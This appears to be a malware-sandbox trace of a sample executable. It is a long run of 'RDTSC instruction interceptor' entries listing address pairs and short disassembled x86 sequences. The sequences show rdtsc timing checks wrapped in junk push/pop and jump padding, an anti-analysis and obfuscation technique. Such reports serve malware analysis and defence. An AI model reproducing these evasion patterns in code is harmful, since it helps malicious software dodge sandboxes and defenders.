Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D23406 second address: D23412 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D23412 second address: D23416 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D2D7D0 second address: D2D7DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007F953D46ED96h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D2C88D second address: D2C893 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D2C893 second address: D2C897 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D2C897 second address: D2C8CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D01523Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F953D015248h 0x00000012 push eax 0x00000013 push edx 0x00000014 jbe 00007F953D015236h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D2C8CB second address: D2C8D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D2D28C second address: D2D297 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D2D297 second address: D2D2C0 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F953D46ED96h 0x00000008 jmp 00007F953D46EDA1h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jc 00007F953D46ED96h 0x00000017 js 00007F953D46ED96h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D2FB3B second address: D2FB3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D2FB3F second address: D2FB50 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D46ED9Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CB0583 second address: CB059F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F953D015240h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D3248E second address: D32499 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D3683D second address: D36841 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D36841 second address: D3685A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D46EDA3h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D3685A second address: D368BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D015242h 0x00000007 jmp 00007F953D015242h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007F953D015248h 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 ja 00007F953D015236h 0x0000001d popad 0x0000001e pushad 0x0000001f jno 00007F953D015236h 0x00000025 jmp 00007F953D01523Ch 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D3CF62 second address: D3CF68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D3B949 second address: D3B955 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F953D015236h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D3BD2C second address: D3BD61 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 pop eax 0x00000009 push edi 0x0000000a pop edi 0x0000000b pop esi 0x0000000c jmp 00007F953D46ED9Dh 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F953D46ED9Ah 0x00000019 push eax 0x0000001a jmp 00007F953D46ED9Dh 0x0000001f pop eax 0x00000020 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CE63F1 second address: CE63F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CE63F5 second address: CE6422 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D46EDA4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007F953D46EDA1h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CE6422 second address: CE642C instructions: 0x00000000 rdtsc 0x00000002 jl 00007F953D01523Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CE642C second address: CE646C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 mov dword ptr [ebp+122D394Eh], edi 0x0000000d mov ebx, dword ptr [ebp+1248F605h] 0x00000013 movzx edi, cx 0x00000016 add eax, ebx 0x00000018 mov ecx, 1969E4C5h 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 jmp 00007F953D46EDA8h 0x00000026 jg 00007F953D46ED96h 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CE646C second address: CE6472 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D3C2BB second address: D3C2D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F953D46ED96h 0x0000000a jns 00007F953D46ED96h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D3C2D0 second address: D3C2D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D3C2D4 second address: D3C2DA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D3C2DA second address: D3C2E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D3C2E6 second address: D3C2EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D4018D second address: D40191 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D404B1 second address: D404B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D40761 second address: D4076E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F953D015236h 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D408ED second address: D408F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D408F1 second address: D408F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D408F5 second address: D4091E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F953D46EDA9h 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D4091E second address: D40922 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D46432 second address: D46441 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F953D46ED96h 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D46441 second address: D4644B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F953D015236h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D4644B second address: D46474 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F953D46ED96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007F953D46EDA2h 0x00000013 jg 00007F953D46ED9Ah 0x00000019 push edx 0x0000001a pop edx 0x0000001b push ebx 0x0000001c pop ebx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D46474 second address: D4648B instructions: 0x00000000 rdtsc 0x00000002 jng 00007F953D015242h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D4648B second address: D46491 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D46491 second address: D46497 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D465ED second address: D46609 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F953D46EDA4h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D468D3 second address: D468E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F953D01523Bh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D468E4 second address: D468F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 js 00007F953D46ED96h 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D468F4 second address: D46910 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F953D015236h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d ja 00007F953D015236h 0x00000013 push edi 0x00000014 pop edi 0x00000015 push esi 0x00000016 pop esi 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D46910 second address: D4692E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F953D46EDA5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D4692E second address: D46948 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F953D01523Dh 0x0000000c jng 00007F953D015236h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D46948 second address: D46952 instructions: 0x00000000 rdtsc 0x00000002 js 00007F953D46ED96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D46F1A second address: D46F32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 jc 00007F953D01523Ah 0x0000000d pushad 0x0000000e popad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pushad 0x00000012 push eax 0x00000013 pop eax 0x00000014 push esi 0x00000015 pop esi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D46F32 second address: D46F41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jc 00007F953D46ED96h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D47238 second address: D4723D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D477CD second address: D477D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D477D5 second address: D477D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D477D9 second address: D477DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D477DF second address: D477E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D47D1A second address: D47D20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D47D20 second address: D47D25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D4BE85 second address: D4BE90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D4C145 second address: D4C14E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D4C14E second address: D4C154 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D4C274 second address: D4C287 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007F953D015236h 0x0000000d jnc 00007F953D015236h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D4C287 second address: D4C299 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 jc 00007F953D46ED96h 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D4C299 second address: D4C2A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D4C3D6 second address: D4C3DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D4C517 second address: D4C541 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 je 00007F953D015236h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 jmp 00007F953D015246h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D4C6B3 second address: D4C6E5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F953D46EDAEh 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F953D46EDA6h 0x00000013 jmp 00007F953D46ED9Ah 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D4C6E5 second address: D4C6E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D5142D second address: D5143C instructions: 0x00000000 rdtsc 0x00000002 jns 00007F953D46ED96h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D5143C second address: D51442 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D51442 second address: D51454 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007F953D46ED9Bh 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D5BC61 second address: D5BC67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D5BC67 second address: D5BC87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F953D46EDA7h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D5BF6A second address: D5BF9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 popad 0x0000000a pushad 0x0000000b jp 00007F953D01523Ah 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 jl 00007F953D01523Ch 0x0000001b jnl 00007F953D015236h 0x00000021 jno 00007F953D01523Ch 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D5C0EC second address: D5C0FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D46ED9Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D6343E second address: D63448 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F953D015236h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D63448 second address: D63451 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D63451 second address: D63466 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d jno 00007F953D015236h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D6314D second address: D63151 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D65A1C second address: D65A32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ja 00007F953D015238h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D65A32 second address: D65A36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D6A755 second address: D6A761 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F953D015236h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D6CB78 second address: D6CB7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D6CB7E second address: D6CBB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F953D015248h 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F953D015245h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D72D78 second address: D72D7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D72D7C second address: D72D8B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F953D01523Eh 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D747D0 second address: D747E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D46EDA2h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D74956 second address: D7495A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D7495A second address: D74974 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F953D46ED9Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D74974 second address: D7497E instructions: 0x00000000 rdtsc 0x00000002 js 00007F953D015236h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D7497E second address: D74984 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D74984 second address: D7498A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
